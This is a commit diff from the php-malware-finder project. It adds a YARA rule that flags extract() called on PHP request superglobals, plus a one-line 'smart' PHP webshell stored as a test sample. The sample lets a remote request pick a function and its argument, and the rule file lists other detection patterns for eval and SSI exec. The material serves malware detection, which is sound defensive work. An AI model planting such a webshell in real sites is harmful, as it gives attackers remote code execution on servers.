diff options
| author | jvoisin | 2017-04-26 17:30:22 +0200 |
|---|---|---|
| committer | jvoisin | 2017-04-26 17:30:22 +0200 |
| commit | 70728896028ab0443ea55e8793bf7da7571fc329 (patch) | |
| tree | 09083cdef376441f7cb89254b08bc0f423513cec | |
| parent | a13e01e548d4870afa7c2572dfa35f3600b1b71e (diff) | |
Add a detection for a smart webshell
| -rw-r--r-- | php-malware-finder/php.yar | 1 | ||||
| -rw-r--r-- | php-malware-finder/samples/undetected/smart.php | 2 |
2 files changed, 3 insertions, 0 deletions
diff --git a/php-malware-finder/php.yar b/php-malware-finder/php.yar index 9b7cf2d..7cb0cf1 100644 --- a/php-malware-finder/php.yar +++ b/php-malware-finder/php.yar | |||
| @@ -98,6 +98,7 @@ rule DodgyPhp | |||
| 98 | $various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec | 98 | $various = "<!--#exec cmd=" //http://www.w3.org/Jigsaw/Doc/User/SSI.html#exec |
| 99 | $at_eval = /@eval\s*\(/ nocase | 99 | $at_eval = /@eval\s*\(/ nocase |
| 100 | $double_var = /\${\s*\${/ | 100 | $double_var = /\${\s*\${/ |
| 101 | $extract = /extract\s*\(\s*\$_(GET|POST|REQUEST|COOKIE|SERVER)/ | ||
| 101 | 102 | ||
| 102 | condition: | 103 | condition: |
| 103 | (any of them) and not IsWhitelisted | 104 | (any of them) and not IsWhitelisted |
diff --git a/php-malware-finder/samples/undetected/smart.php b/php-malware-finder/samples/undetected/smart.php new file mode 100644 index 0000000..f358562 --- /dev/null +++ b/php-malware-finder/samples/undetected/smart.php | |||
| @@ -0,0 +1,2 @@ | |||
| 1 | <?php extract($_REQUEST); @die($ctime($atime)); | ||
| 2 | |||